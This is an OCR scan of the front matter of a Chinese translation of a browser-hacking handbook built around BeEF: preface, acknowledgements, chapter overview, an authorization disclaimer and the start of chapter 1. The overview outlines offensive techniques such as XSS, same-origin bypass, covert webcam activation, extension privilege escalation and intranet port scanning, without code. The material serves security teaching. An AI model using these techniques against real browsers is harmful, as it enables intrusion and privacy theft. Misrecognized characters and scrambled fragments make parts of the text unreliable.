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内 容 提 要 


本 书 由 世界 顶尖 级 黑客 打造 ， 细 致 讲解 了 DIE. Firefox, Chrome 等 主流 浏览 器 及 其 扩展 和 应 用 上 的 安 
全 问题 和 漏洞 ， 介 绍 了 大 量 的 攻击 和 防御 技术 ， 具 体内 容 主要 包括 : 初始 控制 ， 持 续 控制 ， 绕 过 同 源 策 略 ， 
攻击 用 户 、 浏 览 器 、 扩 展 、 插 件 、Web 应 用 、 网 络 ， 等 等 。 这 是 你 在 实践 中 的 必 选 参考 指南 ， 对 实际 开发 
具有 重要 指导 作用 ， 能 够 助 你 在 浏览 器 安全 领域 有 所 作为 。 

本 书 适合 计算 机 安全 技术 人 员 以 及 浏览 器 开发 人 员 。 
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浏览 右 作 为 用 户 访 问 互 联网 的 入 口 ,其 安全 性 至 关 重 要 。 用 户 在 浏览 器 中 的 任何 一 次 不 经 意 
的 点 击 ， 都 可 以 成 为 亚 梦 的 开始 。 攻 击 者 利用 浏览 器 的 一 些 漏洞 ， 仅 需要 用 户 点 击 一 个 链接 : 轻 
者 可 以 窃取 用 户 的 cookie 及 身份 信息 ， 获 得 用 户 浏 览 记 录 等 隐私 ; 重 者 则 导致 用 户 电 脑 上 的 文件 
被 窃取 、 算 改 ， 其 至 用 户 电 脑 会 被 安装 后 门 ， 最 终 沦 为 攻击 者 的 “寺中 之 物 ”。 浏 览 器 承载 着 万 
物 互 连 和 分 享 协 作 ， 因 而 保障 浏览 器 的 安全 越 来 越 重 要 。 

AX, E ER 特别 是 新 的 安全 特性 也 层出不穷 。 比 如 ， 数 据 执行 保护 
(DEP )、 内 存 地 址 随机 化 (ASLR )、 沙 箱 、 隔 离 堆 、 延 时 释放 、 控 制 流 防护 (CFG) 等 ， 诸 多 安 
全 特性 的 出 现 与 应 用 折射 出 浏览 器 已 然 成 为 攻击 者 的 目标 。“ 道 高 一 尺 , 魔 高 一 丈 ”, 新 的 安全 特 
性 必然 会 导致 新 的 攻击 方法 的 出 现 , 只 是 攻击 的 难度 和 成 本 会 越 来 越 大 , 对 攻击 者 技术 的 要 求 也 
越 来 越 高 

未 知 攻 ， 咎 知 防 ?本 书 是 业界 公认 的 最 流行 的 浏览 器 利用 工具 BeEF 的 作者 Wade 等 人 结合 自 
己 亲 身 实践 经 验 电 力 创作 的 ， 系 统 地 介绍 了 浏览 器 的 攻防 技术 。 全 书 以 BeFF 工 具 为 基础 ， 将 浏 
览 器 攻防 分 为 初始 化 、 持 久 化 和 攻击 三 大 阶段 ， 并 在 攻击 阶段 中 从 用 户 、 浏 览 器 核心 、 扩 展 、 插 
件 、Web 应 用 和 网 络 等 多 个 方面 去 细 化 。 全 书 一 共 分 七 个 大 类 讲 浏览 吉 攻击 方法 : 初始 化 、 持 久 
化 、 攻 击 用 户 和 攻击 浏览 器 、 攻 击 扩展 、 攻 击 插件 、 攻 击 Web 应 用 和 攻击 网 络 。 每 一 章 基本 按 攻 
击 方法 划分 ,作者 对 安全 攻防 的 归 类 组 织 结构 做 到 了 一 页 不 差 ， 相 关 的 技术 点 叙述 得 很 清晰 、 很 
全 面 ， 并 有 基于 BeEF 等 工具 的 实际 演示 ， 读 者 能 很 快 理解 和 上 手 。 很 多 技术 点 能 从 原理 上 阐述 
清楚 ， 这 很 难能可贵 。 同 时 ,攻击 手段 上 的 很 多 “ 奇 技 淫 巧 ” 深 受 广大 黑客 的 喜爱 。 对 爱好 浏览 
器 安全 并 打算 详细 了 解 和 学 习 相 关 专业 知 识 的 人 来 说 , 这 本 书 是 最 好 不 过 的 选择 。 本 书 是 迄今 为 
止 介绍 浏览 器 攻防 实战 的 最 详细 之 作 。 

最 后 特别 感谢 团队 leader 张 鲁 和 团队 成 员 为 本 书 审 校 付出 的 心血 ! 
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如 果 没 有 两 位 重要 人 物 ,我 这 一 生 不 会 做 出 什么 有 价值 的 事情 。 非 常 感谢 我 美丽 的 妻子 Carla， 
感谢 她 矢志 不 移 的 支持 和 不 计 其 数 的 提醒 。 虽然 在 本 书 封 面 上 看 不 到 她 的 名 字 , 但 实际 上 本 书 中 
的 每 一 个 字 都 经 过 了 她 的 润色 。 还 要 感谢 我 的 英雄 儿子 Owen， 如 果 不 是 他 亲身 实践 在 面 对 生 活 
挑战 时 应 该 时 刻 面 带 笑 容 ， 我 面 对 的 每 一 个 障碍 都 会 更 加 难以 逾越 。 

另外 ， 能 够 与 Rob Horton 和 Sherief Hammad 共 事 将 近 十 年 对 我 而 言 也 是 一 件 幸 事 。 正 是 他 们 
源源 不 断 的 鼓励 ， 造 就 了 培养 创造 力 和 横向 思维 的 支持 性 工作 空间 。 当 然 ， 还 要 感谢 Michele 和 
Christian 陪 我 一 起 进行 这 次 写作 之 旅 。 


















































Wade Alcorn 





我 在 一 家 银行 初次 遇 到 她 ， 当 时 恰 逢 系统 前 溃 。 如 果 不 是 她 无 限 耐心 的 支持 ,我 想 我 是 不 可 
能 参与 写作 这 本 书 的 。 囊 心 地 感谢 我 最 心爱 的 妻子 Tenille ( 还 有 在 你 肚子 里 成 长 的 女儿 )， 这 本 
书 就 是 为 你 而 写 ( 让 你 知道 怎么 对 付 小 家 伙 )。 我 还 要 感谢 我 的 其 他 家 人 。 感 谢 老 妈 Julia 和 老 爸 
Maurice， 感 谢 你 们 给 了 我 机 会 在 信息 安全 领域 发 展 。 感 谢 我 的 妹妹 Helene 、Justine 和 Amy， 你 们 
让 我 脑 洞 大 开 ， 你 们 的 支持 非常 给 力 。 感 谢 我 的 Asterisk Info Sec 大 家 庭 ， 感 谢 你 们 听 我 抱怨 这 事 
儿 有 多 难 ， 而 且 给 我 时 间 来 做 完 它 ， 非 常 感谢 David Taylor, Steve Schupp Cole Bergersen, Greg 
Roberts 和 Jarrod Burns。 还 得 感谢 澳大利亚 和 新 西 兰 的 黑客 安全 团队 ， 感 谢 我 在 网 上 和 会 议 上 认 
识 的 所 有 朋友 ， 非 常 高 兴 能 够 在 这 个 社区 里 与 你 们 为 伍 ， 共 同 进 步 。 当 然 还 有 Wade 和 Michele， 
我 必须 感谢 你 们 邀请 我 参与 这 个 具有 重大 意义 的 任务 , 感谢 你 们 的 不 大 其 烦 , 感谢 你 们 的 毫 无 保 
留 ， 感 谢 你 们 容忍 我 废话 连篇 ! 


























— — Christian Frichot 








首先 ， 我 想 感谢 我 心爱 的 Ewa， 感 谢 她 在 我 夜以继日 地 做 研究 和 写作 本 书 时 给 予 我 精神 上 的 
支持 。 向 我 的 父母 致敬 ， 因 为 他 们 的 支持 ， 我 才 可 能 走 上 了 研究 和 学 习 新 事物 的 道路 。 非 常 感谢 
我 的 好 朋友 Wade Alcorn 和 Mario Heiderich, ， 感 谢 他 们 对 我 研究 的 启发 ， 以 及 跟 我 进行 火花 四 射 的 
讨论 。 如 果 没 有 他 们 ,这 本 书 就 不 会 写 得 这 么 好 。 为 所 有 相信 Full Disclosure 才 是 暴 漏洞 好 方法 的 
人 人 喝彩。 最后， 感谢 与 我 并 肩 战斗 的 好 友 及 安全 研究 同事 ( 你 们 知道 我 说 的 是 谁 )， 感 谢 你 们 与 
我 分 享 漏洞 利用 技术 以 及 会 议 后 一 起 把 酒 言 欢 。 





























Michele Orru 
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本 书 是 团队 努力 的 结晶 。 首 先 ,感谢 两 位 特约 作者 Ryan Linn 和 Martin Murfitt。 各 大 安全 社区 
也 让 我 们 受益 颇 多 ， 特 别 是 这 些 年 来 为 BeEF 作 出 贡献 的 人 们 。 正 是 他 们 多 年 的 积累 ， 最 终 汇 聚 
成 了 这 本 书 呈现 在 大 家 面前 。 

Wiley 那 些 和 访 可 亲 的 人 以 及 本 书 的 技术 编辑 也 是 我 们 必须 重点 感谢 的 。 不 能 不 提 的 是 Mario 
Heiderich, Carol Long 和 Ed Connor， 感 谢 他 们 的 耐心 、 支 持 和 专业 技能 。 

感谢 Krzysztof Kotowicz、Nick Freeman, Patroklos Argyroudis 和 Chariton Karamitas, 感谢 他 们 
专家 级 的 贡献 。 虽然 我 们 不 可 能 把 每 一 位 要 感谢 的 人 都 一 一 列 在 这 里 , 但 还 是 要 特别 点 出 其 中 几 
位 的 姓名 : Brendan Coles、Heather Pilkington, Giovanni Cattani, Tim Dillon, Bernardo Damele、 
Bart Leppens , George Nicolau, Eldar Marcussen, Oliver Reeves , Jean-Louis Huynen , Frederik Braun, 
David Taylor, Richard Brown, Roberto Suggi Liveranifll Ty Miller。 毫 无 疑问 ， 还 有 其 他 重要 的 名 
字 没 有 出 现在 这 里 。 请 相信 我 们 ， 这 绝 非 故意 的 。 
























































一 一 所 有 作者 
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内 容 介绍 


了 中 

















看 看 你 手中 的 这 本 书 , 它 会 让 你 了 解 我 们 每 天 都 在 用 的 Web 浏 览 句 可 能 遭受 哪些 攻击 。 当然 ， 
用 这 本 书 作为 武器 ,也 可 以 发 起 新 的 攻击 。 本 书 介绍 的 攻击 技术 围绕 最 主流 的 浏览 器 展开 ,偶尔 
也 会 提 到 几 个 非 主 流 的 。 所 谓 主流 浏览 器 ， 也 就 是 Firefox、Chrome 和 Internet Explorer ( 以 下 简称 
“IE”)。 必 要 的 时 候 还 会 涉及 现代 移动 浏览 器 ， 虽 然 移 动 浏 览 絮 不 是 我 们 的 主要 讨论 对 象 ， 但 书 


中 涵盖 的 许多 攻击 技术 有 时 候 对 它们 同样 适用 。 



































攻击 者 和 防御 者 都 需要 理解 Web 浏 览 器 带 给 用 户 的 和 危险。 原因 很 简单 : Web 浏 览 需 可 能 是 21 











世纪 迄今 为 止 最 重要 的 一 种 软件 。 它 是 人 类 访问 网 络 空间 最 重要 的 门户 。 君 不 见 ， 这 个 曾经 笨拙 
的 桌面 软件 ， 如 今 已 经 作为 一 个 主要 的 应 用 程序 进入 了 手机 、 游 戏 机 ， 甚 至 不 起 眼 的 电视 机 里 都 
有 它 的 身影 。Web 浏 览 器 堪 称 今日 表现 、 检 索 和 搜寻 数据 的 “瑞士 军刀 ”。 自 从 Tim Berners-Lee 
萎 士 于 1990 年 发 明 他 的 “可 以 做 到 的 小 Web 浏 览 器 ”以 来 ， 这 个 软件 的 发 展 已 经 远 远 超过 预期 ， 


成 为 当今 世界 最 受 世 人 关注 的 软件 之 一 。 





关于 Web 浏 览 器 的 全 球 用 户 数量 , 有 各 种 各 样 的 统计 和 说 法 。 其 实 只 要 拿 个 烂 笔头 信 手 算 算 ， 











i 
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i 不 难 估计 出 这 是 一 个 多 么 庞大 的 数字 。 假 如 地 球 上 有 三 分 之 一 的 人 上 网 , 那么 浏览 器 用 户 基本 
是 23 亿 。 再 想 一 下 ， 又 会 发 现 其 中 有 一 部 分 人 还 不 止 使 用 一 个 浏览 器 。 他 们 在 家 里 、 单 位 和 手 





机 上 都 使 用 浏览 器 。 就 算 没有 史蒂芬 .霍金 的 智商 ， 也 不 难 猜 到 这 是 多 么 惊人 的 数目 。 
既然 Web 浏 览 絮 的 用 户 数量 如 此 巨大 , 那么 由 此 产生 大 量 安全 问题 和 漏洞 利用 机 会 也 就 不 足 
为 奇 了 。 本 书 从 黑客 角度 着 眼 ， 讲 解 如 何 攻击 以 及 如 何 保护 各 种 情形 下 的 现代 浏览 器 。 














目标 读者 











如 果 你 有 技术 背景 ， 对 浏览 器 面临 的 现实 风险 感 兴趣 ， 




















你 们 的 基础 设施 ， 也 可 能 是 想 破坏 客户 的 资产 。 或 许 你 是 一 个 系统 管理 员 、 开 发 者 ， 甚 至 是 一 
位 信息 安全 专家 。 大 概 你 跟 我 们 很 多 人 一 样 ， 对 ， 


面 的 知识 。 
本 书 假设 你 每 天 都 会 用 浏览 器 ,出 于 某 种 原 





因 想 一 探 其 


文 
[安全 有 着 难以 遏制 的 激情 


那 你 适合 看 这 本 书 。 可 能 你 想 保护 


























正 饥 淘 地 寻找 这 方 


背后 的 究 范 。 要 看 懂 这 本 书 , 最 好 掌 














握 了 基本 的 安全 概念 ， 或 者 额外 花 点 时 间 补 一 补 基础 知识 。 比 如 客户 端 一 服务 需 模 型 、HTTP 协 
议和 一 些 基 本 的 安全 概念 ， 这 些 你 都 不 应 该 陌生 。 

虽然 编程 经 验 不 是 必需 的 ， 但 懂 一 点 基本 原理 才能 看 懂 书 中 的 代码 。 书 中 大 量 的 例子 和 演 
示 全 都 源 自 一 线 实战 ， 使 用 了 多 种 语言 ， 主 要 是 JavaScript 一 一 毕竟 浏览 器 里 它 是 主 宣 。 虽 然 听 
起 来 似乎 不 大 可 能 ， 但 即使 你 以 前 没有 使 用 过 JavaScript， 其 实 关 系 也 不 大 。 每 一 段 代 码 都 有 详 
细 的 解说 。 


本 书 内 容 


本 书 主 要 有 10 章 , 基本 按 攻 击 方法 划分 。 必 要 时 , 每 一 章 会 按 攻 击 点 归 类 , 但 也 不 强求 统一 。 
作者 本 着 有 助 于 读者 开展 专业 安全 攻防 的 目的 ， 组 织 了 本 书 结构 。 

在 任何 安全 攻防 中 ,你 都 不 大 可 能 从 头 到 尾 一 页 不 差 地 翻阅 这 本 书 ， 而 是 会 跳 着 阅读 ， 先 看 
完 前 面 的 介绍 性 章节 ， 然 后 再 视 情 况 跳 到 最 相关 的 章节 。 另 外 , 为 了 马上 和 弄 明 白 某 个 概念 ,你 也 
可 能 会 临时 翻 到 某 一 节 。 为 了 让 本 书 适应 更 多 不 同 的 使 用 情形 ， 有 的 概念 会 在 书 中 反复 提 及 , 但 
每 次 都 会 有 不 同 的 上 下 文 ， 同 时 也 贴近 相应 的 主题 。 

每 一 章 后 面 还 设置 了 思考 题 。 这 些 题 目 可 以 帮 读 者 更 加 扎实 地 理解 相应 章节 中 介绍 的 核心 
概念 。 

第 1 章 ”浏览 器 安全 概述 

这 一 章 是 浏览 器 攻防 之 旅 的 首 站 。 这 里 会 让 大 家 明确 重要 的 浏览 器 概念 ， 以 及 浏览 器 安全 的 
一 些 核心 问题 。 特 别 地 ， 我 们 要 探讨 对 今天 的 组 织 防御 至 关 重 要 的 “ 微 防线 ”( micro perimeter ) 
理念 ， 同 时 反思 一 些 广 为 流 传 却 不 安全 的 错误 做 法 。 

这 一 章 还 讨论 发 动 浏览 器 攻击 的 方法 、 浏 览 器 的 攻击 面 ， 以 及 如 何 使 其 暴露 以 前 隐 珊 的 
资产 。 

第 2 章 ”初始 控制 

浏览 器 每 一 次 连接 到 Web， 都 会 请 求 要 执行 的 指令 。 然 后 ,浏览 器 会 忠实 地 执行 服务 器 发 送 
给 它 的 命令 。 不 用 说 ， 限 制 总 是 有 的 ， 但 浏览 器 仍然 给 攻击 者 留 下 了 很 大 的 攻击 空间 。 

这 一 章 带 领 读者 领略 浏览 器 攻防 的 第 一 阶段 ， 告 诉 你 如 何在 目标 浏览 器 中 执行 自己 的 代码 。 
你 会 看 到 XSS 攻 击 、 中 间 人 攻击 、 社 会 工程 ， 等 等 。 

第 3 章 ”持续 控制 

此 前 介绍 的 初始 控制 技术 只 能 让 你 执行 一 次 指令 。 这 一 章 介 绍 如 何 维持 通信 ,持续 控制 目标 ， 
从 而 能 够 执行 多 轮 命令 。 

在 典型 的 攻击 实战 中 , 应 该 尽 可 能 长 时 间 地 维持 与 浏览 器 的 通信 ,而且 可 能 的 话 ， 即 使 浏览 
顺 重 新 启动 还 要 继续 保持 对 它 的 控制 。 做 不 到 这 一 点 , 那 就 只 能 停留 在 反复 诱 使 目标 进行 连接 的 
阶段 。 

这 一 章 将 介绍 如 何 使 用 payload 维 持 与 浏览 器 的 通信 , 从 而 达到 发 送 多 次 命令 的 目的 。 这 样 就 
可 以 在 至 关 重 要 的 初始 连接 后 , 不 浪费 任何 机 会 。 掌 握 了 这 一 章 的 知识 ， 就 为 后 面 采取 各 种 攻击 
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方法 打下 了 基础 。 

第 4 章 ” 绕 过 同 源 策略 

本 质 上 来 说 ， 同 源 策略 ( SOP ) 就 是 限制 一 个 网 站 与 男 一 个 网 站 之 间 建 立 通信 。 因 为 SOP 可 
以 说 是 浏览 需 安 全 的 一 个 最 基本 的 概念 ， 所 以 你 可 能 会 认为 各 种 浏览 器 组 件 中 的 SOP 都 一 样 ， 而 
且 预 测 常规 操作 的 后 果 也 不 难 。 这 一 章 会 告诉 你 根本 不 是 这 么 回 事 。 

Web 开 发 者 常常 被 SOP 所 困扰 。 对 浏览 器 、 扩 展 和 插件 应 用 SOP 的 方法 各 不 相同 。 而 正 是 由 
于 缺乏 一 致 性 造成 的 理解 出 入 ， 给 攻击 者 在 边界 条 件 下 侵入 系统 提供 了 机 会 。 

这 一 章 讲解 如 何 绕 过 浏览 器 中 不 同 的 SOP 措 施 ， 甚 至 还 会 讨论 拖 放 、 界 面 伪装 和 时 序 攻击 等 
问题 。 还 会 阐释 一 个 足以 令 人 惊讶 的 事实 ， 就 是 在 绕 过 SOP 后 ， 你 可 以 把 浏览 絮 作 为 一 个 HTTP 
代理 来 使 用 。 

第 5 章 Wir 

人 通常 被 认为 是 安全 保障 链条 中 最 薄弱 的 一 环 。 这 一 章 主要 讨论 如 何 攻击 毫 无 戒备 心理 的 用 
户 的 湿 件 。 有 的 攻击 手段 会 利用 第 2 章 介 绍 的 社会 工程 策略 ， 男 一 些 攻击 手段 会 利用 浏览 器 的 功 
能 ， 以 及 浏览 器 对 接收 的 代码 的 信任 。 

这 一 章 会 涉及 反 匿 名 ( de-anonymization ) 和 隐蔽 地 启动 Web 摄 像 头 ， 以 及 运行 恶意 可 执行 文 
件 ， 这 一 切 都 不 必 通 过 用 户 。 

第 6 章 ”攻击 浏览 

虽然 这 一 本 书 都 在 讲 如 何 攻击 浏览 器 ,如 何 绕 过 它 的 安全 部 署 , 但 这 一 章 只 关注 所 谓 的 核心 
浏览 需 ， 换 句 话说， 就 是 没有 任何 扩展 和 插件 的 浏 览 器 。 

在 这 一 章 ， 我 们 会 讨论 直接 攻击 浏览 器 的 过 程 。 我 们 会 探讨 通过 指纹 识别 区 分 厂商 和 版 本 ， 
以 及 如 何 对 运行 浏览 器 的 机 需 发 动 攻击 。 

第 7 章 ”攻击 扩展 

这 一 章 探 讨 如 何 利 用 浏览 器 扩展 的 隐患 。 扩 展 就 是 给 浏览 器 添加 (或 删除 ) 功能 的 软件 。 扩 
展 与 插件 不 同 ， 它 不 是 独立 的 程序 。LastPass 、Firebug、AdBlock 和 NoScript 都 是 常见 的 扩展 。 

扩展 会 在 受信 任 区 域 以 较 高 权限 执行 代码 , 但 接收 的 输入 则 来 自 不 那么 受信 任 的 区 域 ， 比 如 
互联 网 。 对 于 经 验 丰 富 的 安全 专家 来 说 ,这 一 点 就 是 够 引起 重视 的 了 。 在 实践 当中 , 确实 存在 注 
人 攻击 的 风险 ， 而 某 些 攻击 则 会 导致 远程 代码 执行 。 

这 一 章 会 剖析 扩展 攻击 的 方方面面 ， 特 别 是 会 探讨 提升 权限 以 访问 浏览 器 特权 区 域 
C chrome:// )， 从 而 执行 命令 。 

第 8 章 ”攻击 插件 

这 一 章 关 注 攻 击 浏览 器 插件 。 插件 是 为 浏览 器 增加 特殊 功能 的 软件 。 多 数 情况 下 , 插件 可 以 
独立 于 浏览 器 运行 。 

流行 的 插件 包括 Acrobat Reader, Flash Player, Java, QuickTime, 、RealPlayer 、Shockwave 和 
Windows Media Player。 其 中 一 些 插件 是 上 网 必需 的 ， 而 男 外 一 些 则 是 为 了 实现 公司 的 需求 。 比 
如 ， 像 YouTube 这 样 的 网 站 需要 Flash 播 放 视频 ( 但 会 向 HTML5 迁 移 )， 而 Java 是 WebEx 实 现 功能 
所 必需 的 插件 。 




























































































































































































插件 一 直 是 隐患 的 来 源 , 也 是 攻击 利用 的 主要 突破 口 。 稍 后 你 会 看 到 , 插件 是 控制 浏览 器 的 
最 可 靠 的 途径 之 一 。 

在 这 一 章 里 , 我 们 会 探索 使 用 流行 、 免 费 的 工具 分 析 和 利用 浏览 咒 插 件 。 我 们 会 学 习 如 何 绕 
过 “点 击 播放 ”之 类 的 保护 机 制 ， 利 用 插件 中 的 漏洞 取得 浏览 器 的 控制 权 。 

第 9 章 ”攻击 Web 应 用 

浏览 器 虽然 可 以 应 对 基于 Web 的 强力 攻击 , 但 仍然 要 承担 安全 控件 不 利 的 风险 。 浏 览 器 天 生 
要 通过 HTTP 与 服务 嚣 通信。 而 这 些 HTTP 机 制 很 可 能 成 为 被 利用 的 对 象 , 甚至 可 以 通过 它们 控制 
其 他 来 源 的 目标 。 
这 一 章 主要 介绍 在 不 违反 SOP 的 前 提 下 从 浏览 如 发 起 攻击 的 方法 ， 包 括 跨 来 源 的 资源 指纹 ， 
甚至 跨 来 源 的 常见 Web 应 用 隐患 的 识别 技术 。 你 会 发 现 ， 在 使 用 浏览 器 的 时 候 ， 居 然 还 能 够 利用 
跨 来 源 的 XSS 和 SQL 注入 。 

在 这 一 章 最 后 ,你 会 理解 如 何 实现 跨 来 源 的 远程 代码 执行 ,以 及 跨 站 点 请 求 伪 造 攻击 、 基 于 
时 间 的 延迟 枚 举 、 攻 击 认证 和 拒绝 服务 攻击 。 

第 10 章 ”攻击 网 络 

关于 攻击 的 最 后 一 章 , 将 介绍 如 何 通过 端口 扫描 发 现 之 前 未 知 的 主机 ,在 内 网 中 识别 攻击 面 。 
接 下 来 还 会 展示 如 NAT 定 位 (NAT Pinning ) 这 样 的 技术 。 

这 一 章 还 会 介绍 使 用 浏览 器 直接 与 非 Web 服 务 通 信 的 攻击 方式 ， 以 及 如 何 使 用 内 网 协议 利用 
技术 在 浏览 器 内 网 中 俘获 目标 。 

第 11 章 ”结语 : 最 后 的 思考 

本 书 到 这 里 , 已 经 向 大 家 介绍 了 大 量 的 攻击 和 防御 技术 , 而 前 面 所 有 章节 现在 都 可 以 作为 你 
将 来 实践 的 参考 。 和 希望 你 能 够 结合 实际 多 加 思考 ， 在 未 来 的 浏览 器 安全 领域 有 所 作为 。 


本 书 网 站 为 https://browserhacker.com。Wiley 上 的 本 书 主页 为 http://www.wiley.com/go/browser- 
hackershandbook。 在 这 两 个 网 站 上 ,读者 可 以 找到 本 书 的 附加 内 容 。 尽 管 不 能 蔡 代 本 书 ， 但 这 些 
附加 资源 是 本 书 中 内 容 的 有 益 补充 。 

网 站 上 还 包含 可 以 复制 粘贴 的 代码 。 这 样 可 以 你 节省 手工 输入 的 时 间 , 也 希望 能 帮 你 避免 攻 
击 中 的 麻烦 。 此 外 ， 还 有 演示 视频 和 每 章 后 面 问题 的 答案 。 

本 书 不 可 避免 地 会 有 这 样 或 那样 的 错误 ,这 一 点 我 们 都 知道 。 很 不 幸 ， 本 书 三 位 作者 中 有 两 
位 不 靠 谱 ( 至 于 靠 谱 的 是 哪 一 位 ， 至 今 我 们 三 个 还 在 激烈 地 争论 )。 如 果 你 想 知 道 现在 我 们 是 否 
有 了 结论 ， 可 以 访问 网 站 https://browserhacker.com， 当 然 更 重要 的 是 ， 你 也 可 以 找到 对 其 他 读者 
发 现 的 错误 的 修正 。 如 果 你 也 发 现 了 错误 ， 而 且 网 站 中 还 没有 列 出 ， 请 告诉 我 们 。 
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备 足 弹药 


本 书 会 介绍 可 以 用 于 攻击 浏览 需 的 各 种 工具 ,把 这 么 多 种 工具 收入 工具 箱 , 将 来 必 有 用 武之 地 。 

需要 注意 的 是 ,本 书 旨 在 介绍 如 何在 较 低 的 级 别 上 使 用 这 些 工 具 。 随 着 你 的 技能 越 来 越 丰 富 ， 
就 会 发 现 了 解 这 些 用 法 非常 重要 。 我 们 的 目标 就 是 不 仅 让 你 知道 怎么 使 用 工具 ， 还 要 理解 它们 ， 
从 而 避免 误 用 。 

我 们 还 希望 你 知道 所 有 工具 都 有 自己 的 短处 ,你 应 该 根据 自己 的 知识 选择 它们 。 你 的 工具 
箱 中 最 重要 的 工具 ,就 是 你 的 知识 。 本 书 作 者 的 主要 目标 就 是 增长 你 的 知识 ,而 不 是 单纯 地 扩充 
你 的 软件 库 。 

本 书 中 有 两 个 最 常用 的 工具 ， 一 个 是 BeEF (Browser Exploitation Framework )， 男 一 个 是 
Metasploit。 当 然 ， 我 们 要 介绍 的 工具 不 限于 此 ， 而 且 你 还 会 了 解 所 有 工具 的 长 处 和 短处 。 

本 书 作者 就 是 BeEF 项 目的 核心 开发 者 ， 致 力 于 让 这 个 社区 工具 与 本 书 描述 的 方法 相 契 合 。 
本 书 中 的 很 多 示例 都 选 自 BeEF 的 代码 ， 而 在 这 个 工具 中 ， 大 多 数 过 程 都 已 经 实现 了 自动 化 。 


ia Fa BA 


有 必要 在 这 里 声明 一 下 ， 作 为 安全 专业 人 士 ， 应 该 注意 自我 约束 。 本 书 所 教授 的 任何 方法 ， 
都 不 是 为 了 鼓励 读者 去 做 违反 法 律 的 事情 。 


在 实施 黑客 攻击 行动 之 前 , 请 确保 得 到 了 充分 授权 。 这 不 仅 适 用 于 安全 纪律 ,同样 也 适用 于 
本 书 讨 论 的 所 有 技术 。 


祝 你 好 运 


浏览 器 安全 是 互联 网 上 升级 最 快 的 军备 竞赛 之 一 。 对 所 有 关注 安全 的 人 来 说 , 它 都 是 一 个 迷 
人 而 又 有 趣 的 领域 。 这 个 军备 竞赛 升级 的 步伐 之 所 以 慢 不 下 来 ,主要 是 因为 各 种 公司 日 益 依赖 浏 
览 需 去 做 越 来 越 多 的 事 。 

我 们 注意 到 , 大 大 小 小 的 公司 越 来 越 认 为 不 应 该 在 桌面 计算 机 中 运行 一 个 独立 的 软件 。 而 任 
何 预 测 浏览 器 将 逐渐 没落 的 人 ， 都 应 该 好 好 地 清醒 清醒 ， 因 为 他 们 可 能 还 在 使 用 着 隐患 多 多 的 
Java 搬 件 呢 ! 

浏览 器 军备 竞赛 和 商业 公司 对 它 的 广泛 应 用 , 使 得 浏览 器 的 攻击 面 不 断 变化 , 而 来 自 安全 的 
挑战 从 未 绝迹 。 现 在 , 我们 就 准备 大 干 一 场 ， 看 看 黑客 如 何 攻击 浏览 器 ， 而 我 们 又 应 该 如 何 加 强 
防御 ! 
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天 生 低 调 的 浏览 器 却 肩 负 着 保护 用 户 安全 的 重任 。 浏 览 器 的 工作 机 制 ， 就 是 向 整个 互联 网 请 
求 指令 ,请 求 到 以 后 几乎 不 加 任何 质疑 地 去 执行 。 浏 览 器 之 所 以 为 浏览 器 ， 就 是 要 忠实 地 汇聚 远 
程 获取 的 内 容 ， 把 它们 组 织 成 人 类 可 以 辨识 的 形式 ， 同 时 还 要 支持 今天 所 谓 的 Web 2.0 应 有 的 丰 
富 功能 。 

但 是 作为 一 款 软件 ,浏览 器 又 是 如 此 重要 : 它 不 仅 要 帮 你 维护 社交 网 络 ， 还 要 替 你 完成 在 线 
银行 的 交易 。 这 个 软件 有 义务 保证 你 在 网 络 世 界 中 的 安全 ,无论 你 冒险 问 入 的 是 什么 胡同 街 巷 。 
这 个 软件 有 义务 支持 你 在 一 个 标签 页 里 不 知 次 浅 的 探险 , 同时 又 在 男 一 个 标签 页 里 进行 重大 涉 密 
交易 。 很 多 人 把 自己 的 浏览 右 当 成 装甲 车 ， 认 为 自己 能 坐 在 里 面 安全 舒适 地 观察 外 面 的 世界 ， 而 
不 用 担心 泄漏 任何 个 人 隐私 , 或 者 遭受 任何 威胁 。 等 把 这 本 书 全 看 完 , 你 就 会 明白 这 个 假设 是 否 
成 立 了 。 

这 款 “无 所 不 能 ”的 神奇 软件 的 开发 困 队 ， 必 须 确 保 其 庞大 身躯 的 每 个 角落 、 每 道 接 颖 ,都 
不 给 黑客 留 下 可 乘 之 机 。 不 管 你 是 否 这 么 想 过 ,实际 上 你 每 次 使 用 浏览 絮 ， 都 默认 信任 了 从 未 谋 
面 (很 可 能 这 辈子 永远 也 不 会 见面 ) 的 一 群 人 ,相信 这 群 人 能 够 保障 你 的 重要 信息 不 会 被 互联 网 
上 的 黑客 窃取 。 

本 章 介 绍 Web 浏 览 器 攻防 相关 的 方法 论 。 我 们 会 讨论 浏览 器 在 Web 生 态 系统 中 扮演 的 角色 ， 
包括 它 与 Web 服 务 器 之 间 的 互动 关系 。 此 外 ,本章 还 会 介绍 一 些 浏览 锅 安 全 基础 知识 ， 为 本 书后 
续 各 章 的 内 容 提 供 脉 络 。 


1.1 首要 问题 


请 大 家 暂时 忘掉 浏览 器 ， 只 想 着 眼前 有 一 块 空白 的 安全 画布。 假设 你 身 处 这 么 一 种 境况 : 你 
要 对 一 家 公司 的 安全 负责 ,必须 作出 某 些 决策 。 你 在 决定 部 署 某 个 软件 时 , 会 不 会 考虑 它 可 能 
临 的 风险 有 多 大 ?这 个 软件 必须 在 标准 运行 环境 ( Standard Operating Environment, SOE ) 中 无 差 
异地 安装 到 公司 内 的 几乎 所 有 机 器 上 。 人 们 要 通过 它 来 存 取 最 敏感 的 数据 ， 执 行 最 敏感 的 操作 。 
这 个 软件 几乎 是 公司 每 个 员工 的 日 常 工具 , 包括 CEO 、 董 事 会 成 员 、 系 统管 理 员 、 财 务 、 人 力 资 
源 ， 甚 至 你 们 的 客户 。 鉴 于 它 对 公司 的 核心 业务 数据 拥有 如 此 高 的 权限 ， 毫 无 疑问 会 成 为 黑客 的 
理想 攻击 目标 ， 因 而 面临 极 大 风险 。 
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这 个 软件 的 设计 规格 大 致 是 这 样 的 。 
a 它 要 向 互联 网 请 求 指令 ， 然 后 执行 获取 的 指令 。 
m 防御 者 无 法 控制 这 些 指令 。 
m 某 些 指令 会 要 求 这 个 软件 从 以 下 来 源 再 次 请 求 其 他 指令 : 
> 互联 网 的 其 他 地 方 ; 
> 内 部 网 的 其 他 地 方 ; 
> 非 标 准 的 HTTP 和 HTTPS TCP 端口 。 
口 某 些 指 令 会 要 求 这 个 软件 通过 TCP 发 送 数据 。 这 可 能 会 造成 对 其 他 联网 设备 的 攻击 。 
a 它 会 与 互联 网 中 任意 服务 器 进行 加 密 通信 。 防 御 者 无 法 看 到 通信 内 容 。 
